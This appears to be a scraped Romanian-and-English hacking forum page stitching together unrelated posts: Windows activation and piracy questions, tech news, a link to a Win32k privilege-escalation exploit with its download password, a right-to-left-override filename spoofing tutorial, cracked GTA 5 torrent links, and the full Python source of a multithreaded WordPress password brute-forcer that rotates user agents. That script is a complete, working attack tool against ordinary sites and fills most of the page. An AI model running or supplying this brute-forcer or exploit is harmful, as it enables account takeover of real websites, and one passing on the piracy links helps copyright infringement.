Search the Community

Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source

Salut, am un Windows 8.1 Pro Build 9600 pe un HP care e pre activat pe un Windows 8 simplu..am incercat sa bag niste activatoare pt 8.1 pro dar nimic deoarece in BIOS e prea activat OEM-ul ala, problema e ca nu mai am nici key original de la windows-ul pre activat cand a fost cumparat, Mentionez ca Windows 7 merge ok cu activator cand il instalez dar am zis sa trec putin la 8.1. Ce e de facut in situatia asta? am incercat cu activare online cu SLUI 04 03 in search box dar zice ca nu pot sa il activez prin telefon probabil din cauza tarii. Laptopul a fost cumparat de la bulangii de la Altex si nu i-a dat nici un key la el, nici pe el nu scrie vreun key iar pe spate e sters scrisul ala si nu se intelege nimic.

In this article we will learn about the one of the most overlooked spoofing mechanisms, known as right to left override (RTLO). What is RTLO? RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading of Arabic or Hebrew text. Unicode has a special character, U+202e, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to disguise the names of files and can be attached to the carrier like email. For example, the file name with ThisIsRTLOfileexe.doc is actually ThisIsRTLOfiledoc.exe, which is an executable file with a U+202e placed just before “doc.” Though some email applications and services that block executable files from being included in messages also block .exe programs that are obfuscated with this technique, unfortunately many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. For example, let’s create a file with Name TestingRTLO[u+202E]xcod.txt. “U+202E” can be copied and pasted from the above character map present in Windows. To make sure something is present in the character, do the following steps: Create a new text document and see its properties and note down its name: Now rename the file with the copied U+202E characters and see the change in file name: Now rename the File TestingRTLO[u+202E]xcod.txt with characters inserted and see the below results. File extension types that can be dangerous The below section lists the common file types that can be used to execute unwanted code in the system: .bat .exe .cmd .com .lnk .pif .scr .vb .vbe .vbs .wsh Remediation against RTLO Though most endpoint security solutions like antivirus detect this type of spoofing, and some IRC clients even change the crafted malicious links back to original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is in the usage of the backdoor “Etumbot”. Some features of Windows also help to carry this type of attack, such as Windows hides the file extensions by default. Malicious individuals can set any icon they want for let’s say a .exe file. A file named pic.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. Uncheck this selection and Windows will stop hiding extension for known file types. Another good approach is to make sure that the folder where all the downloads take place should have its view set to ‘content’. This will make sure that the files will appear in their original form despite all the changes. Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc. Source

Microsoft files lawsuit against Verizon IP seeks damages for hundreds of suspicious Windows 7 activations from a Verizon IP address Verizon has incurred the wrath of Microsoft for allegedly activating hundreds of copies of Windows 7 illegally. In a lawsuit filed at a Washington court, the Seattle-based company has asked the court to let it serve a subpoena on Verizon to force the Internet provider to identify those behind a two-year scheme that supposedly logged hundreds of suspicious product activations from a Verizon IP address and is now seeking damages. In its 29 year history, Microsoft’s Windows operating systems have been pirated millions number of times. On some levels, it is a practice that Microsoft has accepted with regular consumers largely trying to keep away from the company’s aggression. However, the same cannot be said of those pirating the company’s products on a commercial scale. According to documents filed with a U.S. District Court in Seattle last week, Microsoft targets individuals behind a single IP address 74.111.202.30, which was the origin of the Windows 7 product activations. Microsoft will not be able to find who are responsible for this serious Windows pirating, unless Verizon provides the subscriber name or names for that address. Microsoft said “Microsoft seeks leave to serve a Rule 45 subpoena on Verizon Online to obtain subscriber information associated with the infringing IP address at the time of the alleged acts of infringement.” “As part of its cyberforensic methods, Microsoft analyzes product key activation data voluntarily provided by users when they activate Microsoft software, including the IP address from which a given product key is activated,” the lawsuit reads. Microsoft says that its forensic tools lets the company to examine billions of activations of Microsoft software and identify patterns “that make it more likely than not” that an IP address connected with activations is the one through which pirated software is being activated. Currently, the address is established with Verizon FIOS, the Internet provider’s broadband service. These activations have features that on facts and belief, indicate that Defendants are using the IP address to activate pirated software. In a complaint filed on April 28, Microsoft laid out its case, naming a series of “John Does”, as it had not been able to find the real names of the alleged culprits. Microsoft said “The infringing IP address has been used to activate hundreds of copies of Windows 7,” using stolen or illegal activation keys. Some of the keys had been stolen from its supply chain, others were keys appointed for OEMs but instead used by an unauthorized party, and still more were legit keys that were used more than it was allowed for. One of Microsoft’s primary anti-piracy technologies is Product activation and it depends on the unique 25-character code allocated to each copy of the operating system. Customers and OEMs activate Windows by connecting to Microsoft’s servers. “Based on the volume and pattern of their activation activity, on information and belief, defendants appear to consist of one or more commercial entities that subsequently distributed those systems to customers who, on information and belief, were unaware they were receiving pirated software,” the complaint read. Microsoft examined the incoming product activations from the single source, and deduced that the “activation patterns and characteristics … make it more likely than not that the IP address associated with the activations is an address through which pirated software is being activated.” Senior Paralegal at Microsoft in an affidavit asserted that the pirates had been operational for “at least the past two years.” Once Microsoft is able to identify the people responsible for the IP address, it plans to sue them for copyright and trademark infringement, deceptive practices, treble damages and attorney fees or, alternatively, statutory damages. Sursa: http://www.techworm.net/2015/05/microsoft-wants-verizon-to-hand-over-names-of-suspected-windows-pirates.html

Salutare tuturor,zilele trecute a fost scapata pe internet data cand se va lansa Windows 10,din vina unui director neglijent.Atunci cand lucrezi la un proiect mare care implica multe persoane, e de asteptat ca cel putin una dintre ele sa scape informatii importante. Ceea ce se pare ca s-a si intamplat.Microsoft a mai spus ca noul Windows 10 se va lansa in vara, dar acum, CEO-ul companiei AMD, direct interesat de proiect, a oferit mai multe informatii. Mai exact, ea a pronuntat cuvintele "la sfarsitul lui iulie" in timpul unei discutii, scrie ZDNet.com. CEO-ul si presedintele AMD, Lisa Su, a declarat: "Cu lansarea lui Windows 10 la sfarsitul lui iulie, asteptam sa vedem impactul asupra perioadei in care elevii se reintorc la scoala". Cei de la AMD sunt foarte interesati sa vada ce se intampla cu Windows 10, pentru ca isi fac si ei planuri mari pe zona hardware. Totusi, informatia trebuie luata cu o doza de scepticism. Pana cand Microsoft nu confirma, perioada lansarii ramane cu semnul intrebarii. Multumesc pentru timpul acordat!

Ce sistem / sisteme de operare folositi si de ce? Eu folosesc windows pe desktop pentru gaming si oleaca de programare, majoritatea timpului ma ocup cu administrarea site-urilor si imi e mai usor de pe windows, fiind obisnuit cu el de mic . Folosesc si linux, dar doar ca server, debian si centos sunt cele care imi plac cel mai mult cu nginx si apache sau litespeed amandoua cu mariaDB (sa fie binecuvantat serveru). Voi?

Windows 10 has all kinds of great stuff going on under the hood, but one of the most intriguing things is a special version designed for the Raspberry Pi 2 and Arduino-certified boards. You can check out that version right now. All the Important Stuff Microsoft Announced at Build 2015 Today Today, Microsoft held its (mostly boring!) developer keynote at Build 2015. If you’re not a… Read more The Windows 10 IoT Core Insider developer preview works with the Raspberry Pi 2, MinnowBoard Max, and Intel Galileo. It’ll also interface with other Arduino boards through a Windows Remote and Windows Virtual Shields. As you’d expect, the software’s a little rough around the edges, but the Windows Dev Center has a bunch of projects to get you familiar with the software. You can sign up for the developer preview and download the newest build for free at the link below. Develop Windows IoT Apps | Windows Dev Center via Windows Blog Source: LifeHacker

Salut baietii, Sa nu radeti de cererea mea... Am un laptop (Acer Aspire 3004 wmli) vechi de cand lumea, are un procesor de 1,8 si 512 rami, orice windows a-si pune merge fix ca dracu... Nu se foloseste pe el decat browserul dar...daca am intrat pe youtube de exemplu sau facebook...e gata...mort. Procesorul poate ar duce el ceva dar ramii... Da-mi un windows (nu linux) ceva mini...pe care sa pot rula cat de cat un browser pe acest cadavru de laptop, recomandati-mi ceva. Multam'.

Microsoft offers the Remote Desktop Protocol (RDP) in Windows to allow remote desktop connections, and while most versions of Windows include a RDP client, only the Professional, Ultimate and Server editions offer the RDP server to accept incoming connections. Unlike server editions of Windows, Microsoft limits the client editions of Windows to one concurrent user, whether remote or local. So if a remote desktop connection is made, no one physically at the PC can use it or even see the desktop without first kicking off the remote user. Today i am going to show you How to Enable Concurrent Remote Desktop Sessions in Windows server 2012 r2 Files description: RDPWInst.exe RDP Wrapper Library installer/uninstaller RDPCheck.exe Local RDP Checker (you can check the RDP is working) RDPConf.exe RDP Wrapper Configuration install.bat Quick install batch file uninstall.bat Quick uninstall batch file https://github.com/binarymaster/rdpwrap/releases

Compania americana face eforturi ca sa atraga cat mai multi clienti, pe care insa isi doreste sa ii tina in siguranta. Programatorii de la Microsoft lucreaza intens acum la Spartan, browserul pe care il vor avea persoanele care isi vor instala Windows 10. Cei care sunt parte din programul Windows Insider pot deja sa testeze softul atat pe PC, cat si pe telefoanele cu Windows. In timp ce userii care stiu programare si entuziastii se joaca cu softul si le transmit celor de la Microsoft parerile lor, compania a pregatit si un sistem de recompense. Hackerii sunt invitati sa incerce sa gaseasca moduri in care Spartan poate fi spart. Project Spartan Bug Bounty ofera pana la 15.000 de dolari celor care gasesc vulnerabilitati si anunta Microsoft. Hackerii au timp pana pe 22 iunie sa testeze limitele de securitate ale noului soft. Cel mai bine se vor plati vulnerabilitatile descoperite in modul "enhance protected" al Spartan. Microsoft si alte companii mari din tehnologie folosesc metoda recompenselor oferite hackerilor pentru a-si face softurile mai bune, si a descoperi probleme din timp. Un project manager la Spartan este specialistul Bogdan Brinza. Potrivit profilului sau de LinkedIn, el a inceput munca in cadrul companiei Microsoft in 2008, de la biroul din Moscova, pentru ca din 2011 sa se mute in SUA. El are ca limba materna limba rusa si a absolvit National University of Science and Technology "MISIS" (Moscow Institute of Steel and Alloys), si Higher School of Economics din Moscova. Potrivit informatiilor venite pe filiera AMD, Windows 10 ar urma sa se lanseze la sfarsitul lunii iulie. Sursa

Windows 10 Technical Preview Fundamentals for IT Pros Ce parere aveti? Eu unu daca e vb de windows prefer 7 sau poate XP ))))

Salutare,am revenit cu un topic destul de interesant zic eu pentru cei pasionati de jocurile Rockstar. Am pentru voi GTA 5 varianta pentru [PC]! Link download torrent: Download Grand Theft Auto V / GTA 5 (v1.0.323.1, CRACKED, MULTI11) [FitGirl Initial Repack] Torrent - Kickasse Link download crack for GTA 5: Download Grand Theft Auto V [Crack V2 - for Windows 7 / 8 / 8.1] Torrent - Kickasse Cerinte de sistem minime: Operating System: Windows 8.1 64 Bit, Windows 8 64 Bit, Windows 7 64 Bit Service Pack 1, Windows Vista 64 Bit Service Pack 2* (*NVIDIA video card recommended if running Vista OS) Processor: Intel Core 2 Quad CPU Q6600 @ 2.40GHz (4 CPUs) / AMD Phenom 9850 Quad-Core Processor (4 CPUs) @ 2.5GHz - actually works on dual-core CPUs as well RAM: 4 GB Video Card: NVIDIA 9800 GT 1GB / AMD HD 4870 1GB (DX 10, 10.1, 11) DirectX: 10 HDD Space: 57 GB (~95 GB during installation of this repack) Sper ca vam fost de ajutor si am postat unde trebuie(CRED) Multumesc pentru timpul acordat! Cu stima,JrNasti.PPOW

Primit acum cateva momente de la compania de hosting: A recent exploit (CVE-2015-1635) affecting IIS was released yesterday. The exploit is a Denial of Service (DoS) vulnerability in the HTTP.sys. Versions of Windows that are vulnerable: Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any version of IIS running on one of these operating systems. A patch was released on Tuesday April 14th as part of Microsoft's Patch Tuesday, we recommend that you patch your IIS affected servers as soon as possible to avoid any potential DoS exploits. More detailed information of the vulnerability can be found here https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583

Salut. Pe computer am un windows 7 recent instalat, dup? toate instal?rile necesare (strictul necesar) aveam 157 GB liber ( hdd mai vechi ) pe parti?ia C: ( unde sunt fi?ierele sistemului ) peste o zi m? trezesc cu 154 GB liber, ok am zis c? poate am mai instalat eu ceva ?i na.. A treia zi 151 GB liber dup? nicio instalare, absolut nimic, nici update la windows nici un notepad de 1 kb în plus. Îmi pute?i spune ?i mie de ce mi se umple memoria a?a de repede? Chiar nu v?d problema, windows-ul a fost reinstalat acum 4 zile ?i programe multe nu am.. V? rog s? m? ajuta?i. V? mul?umesc anticipat.

This is a python script that performs brute forcing against WordPress installs using a wordlist. WordPress Brute Force by Claudio Viviani Inspired by xSecurity's WordPress Brute Muliththreading Tested on Wordpress 3.x and 4.x Disclaimer: This tool is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this exploit. In any case you disagree with the above statement,stop here. Requirements: python's httplib2 lib Installation: pip install httplib2 Features: Multithreading xml-rpc brute force mode http and https protocols support Random User Agent CHANGELOG: 2015-04-12 v2.0 Add new feature xml-rpc brute force mode Fix minor bugs 2015-04-11 v1.1 optparse (Deprecated since version 2.7) replaced by argparse Fix connection bugs Download: #!/usr/bin/env python# # WordPress Brute Force by Claudio Viviani # # Inspired by xSecurity's WordPress Brute Muliththreading # # Tested on Wordpress 3.x and 4.x # # Disclaimer: # # This tool is intended for educational purposes only and the author # can not be held liable for any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this exploit. # In any case you disagree with the above statement,stop here. # # Requirements: # # 1) python's httplib2 lib # Installation: pip install httplib2 # # Features: # # 1) Multithreading # 2) xml-rpc brute force mode # 3) http and https protocols support # 4) Random User Agent # # CHANGELOG: # # 2015-04-12 v2.0 # 1) Add new feature xml-rpc brute force mode # 2) Fix minor bugs # # 2015-04-11 v1.1 # 1) optparse (Deprecated since version 2.7) replaced by argparse # 2) Fix connection bugs # # import urllib, httplib, httplib2 import socket, sys, os, os.path, argparse, random from threading import Thread from time import sleep banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' _______ __ _______ | _ .----.--.--| |_.-----| _ .-----.----.----.-----. |. 1 | _| | | _| -__|. 1___| _ | _| __| -__| |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____| |: 1 \ |: | |::.. . / |::.| `-------' `---' W0rdBRUTEpr3ss v2.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch http://ffhd.homelab.it (Free Fuzzy Hashes Database) https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] UA = random.choice(userAgent) return UA def urlCMS(url,brutemode): if url[:8] != "https://" and url[:7] != "http://": print('\n[X] You must insert http:// or https:// procotol') os._exit(1) # Page login if brutemode == "std": url = url+'/wp-login.php' else: url = url+'/xmlrpc.php' return url def bodyCMS(username,pwd,brutemode): if brutemode == "std": body = { 'log':username, 'pwd':pwd, 'wp-submit':'Login', 'testcookie':'1' } else: body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName> <params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd) return body def headersCMS(UA,lenbody,brutemode): if brutemode == "std": headers = { 'User-Agent': UA, 'Content-type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' } else: headers = { 'User-Agent': UA, 'Content-type': 'text/xml', 'Content-Length': "%d" % len(lenbody)} return headers def responseCMS(response): if response['set-cookie'].split(" ")[-1] == "httponly": return "1" def connection(url,user,password,UA,timeout,brutemode): username = user pwd = password http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True) # HTTP POST Data body = bodyCMS(username,pwd,brutemode) # Headers headers = headersCMS(UA,body,brutemode) try: if brutemode == "std": response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body)) if str(response.status)[0] == "4" or str(response.status)[0] == "5": print('[X] HTTP error, code: '+str(response.status)) os._exit(1) if responseCMS(response) == "1": print('\n') print('[!] Password FOUND!!!') print('') print('[!] Username: '+user+' Password: '+password) os._exit(0) checkCon = "OK" return checkCon else: response, content = http.request(url, 'POST', headers=headers, body=body) if str(response.status)[0] == "4" or str(response.status)[0] == "5": print('[X] HTTP error, code: '+str(response.status)) os._exit(1) # Remove all blank and newline chars xmlcontent = content.replace(" ", "").replace("\n","") if not "403" in xmlcontent: print('\n') print('[!] Password FOUND!!!') print('') print('[!] Username: '+user+' Password: '+password) os._exit(0) checkCon = "OK" return checkCon except socket.timeout: print('[X] Connection Timeout') os._exit(1) except socket.error: print('[X] Connection Refused') os._exit(1) except httplib.ResponseNotReady: print('[X] Server Not Responding') os._exit(1) except httplib2.ServerNotFoundError: print('[X] Server Not Found') os._exit(1) except httplib2.HttpLib2Error: print('[X] Connection Error!!') os._exit(1) commandList = argparse.ArgumentParser(sys.argv[0]) commandList.add_argument('-S', '--standard', action="store_true", dest="standard", help="Standard login brute", ) commandList.add_argument('-X', '--xml-rpc', action="store_true", dest="xml", help="Xml-rpc login brute", ) commandList.add_argument('-t', '--target', action="store", dest="target", help="Insert URL: http://www.victimurl.com[:port]", ) commandList.add_argument('-u', '--username', action="store", dest="username", help="Insert username", ) commandList.add_argument('-w', '--wordfilelist', action="store", dest="wordfilelist", help="Insert wordlist file", ) commandList.add_argument('--timeout', action="store", dest="timeout", default=10, type=int, help="Timeout Value (Default 10s)", ) options = commandList.parse_args() # Check bruteforce mode conflicts if options.standard and options.xml: print "\n[X] Select standard [-S] OR xml-rpc ] bruteforce mode" sys.exit(1) # Check args if not options.standard and not options.xml: print(banner) print commandList.print_help() sys.exit(1) elif not options.target or not options.username or not options.wordfilelist: print(banner) print commandList.print_help() sys.exit(1) # Set bruteforce mode if options.standard: brtmd="std" else: brtmd="xml" # args to vars url = options.target user = options.username password = options.wordfilelist timeout = options.timeout # Check if Wordlist file exists and has readable if not os.path.isfile(password) and not os.access(password, os.R_OK): print "[X] Wordlist file is missing or is not readable" sys.exit(1) # Open and read Wordlist file wordlist = open(password).read().split("\n") # Remove last empty values from wordlist list del wordlist[-1] # Total lines (password) in Wordlist file totalwordlist = len(wordlist) # Gen Random UserAgent UA = randomAgentGen() # Url to url+login_cms_page url = urlCMS(url,brtmd) print(banner) print print('[+] Target.....: '+options.target) print('[+] Wordlist...: '+str(totalwordlist)) print('[+] Username...: '+user) if brtmd == "std": print('[+] BruteMode..: Standard') else: print('[+] BruteMode..: Xml-Rpc') print('[+]') print('[+] Connecting.......') print('[+]') # Check connection with fake-login if connection(url,user,UA,UA,timeout,brtmd) == "OK": print('[+] Connection established') # Reset var for "progress bar" count = 0 threads = [] for pwd in wordlist: count += 1 t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd)) t.start() threads.append(t) sys.stdout.write('\r') sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist)) sys.stdout.flush() sleep(0.210) for a in threads: a.join() # no passwords found print('\n[X] Password NOT found ') WordPress Brute Forcer 2.0 ? Packet Storm

